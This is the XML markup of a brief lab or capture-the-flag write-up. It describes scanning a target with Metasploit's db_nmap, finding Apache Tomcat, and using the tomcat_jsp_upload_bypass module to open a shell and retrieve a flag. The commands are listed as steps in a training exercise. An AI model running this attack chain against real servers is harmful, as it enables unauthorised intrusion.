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8A495" w14:textId="77777777" w:rsidR="00080DC8" w:rsidRDefault="00080DC8"/>
    <w:p w14:paraId="0B937EDC" w14:textId="5A70C74D" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t xml:space="preserve">Just to mix things up, making a workspace in Metasploit with command workspace -a, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD0D71" w14:textId="68896A0F" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>Then do db_nmap -sS -sV -O ip.add.re.ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D111B6" w14:textId="3302BABC" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>We see apache tomcat running an interesting http server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620659EB" w14:textId="75F4E2DE" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F98602C" wp14:editId="31E909AB">
            <wp:extent cx="5939155" cy="2264410"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="102990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2264410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F6F1C" w14:textId="114DC997" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>Do some magic google dorking to figure out what exploits this version of apache is vulnerable to, since nothing comes up with keywords in exploit db and tomcat has too many hits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F92DDF" w14:textId="6F5F18EC" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62494369" wp14:editId="7B7C6C99">
            <wp:extent cx="5939155" cy="5268595"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="262985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5268595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331D9E2D" w14:textId="053466AF" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>The search returns a number of possible exploits,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58CCBB" w14:textId="415FAF2E" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FA9555" wp14:editId="362EEDA5">
            <wp:extent cx="5939155" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="4445" b="9525"/>
            <wp:docPr id="1492863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2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BECDC" w14:textId="49DCFDD4" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>Sadly, none of these match the actual thing we’re supposed to run for this lab, so you just gotta magic your way into knowing it’s the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3AB8A" w14:textId="77777777" w:rsidR="00080DC8" w:rsidRDefault="00080DC8" w:rsidP="00080DC8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="00080DC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit/multi/http/tomcat_jsp_upload_bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C7B05" w14:textId="0B3E35BC" w:rsidR="00080DC8" w:rsidRDefault="00080DC8" w:rsidP="00080DC8">
      <w:r>
        <w:t xml:space="preserve">then do the command: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r>
        <w:t>ip.add.re.ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7E975" w14:textId="3E5EAE7D" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:t>and run to open a shell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D54C7B" w14:textId="6DE2F1A6" w:rsidR="00A71010" w:rsidRDefault="00A71010">
      <w:r>
        <w:t>navigate to the flag and win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB1FB9" w14:textId="1B0F5C23" w:rsidR="00080DC8" w:rsidRDefault="00080DC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763EE9C2" wp14:editId="20709BA2">
            <wp:extent cx="4867910" cy="3143885"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="367805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910" cy="3143885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00080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C8"/>
    <w:rsid w:val="00080DC8"/>
    <w:rsid w:val="002549AC"/>
    <w:rsid w:val="00A71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E130"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F366449-B6BB-4303-9077-54799628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Summerlin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Summerlin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-09T01:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-09T01:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>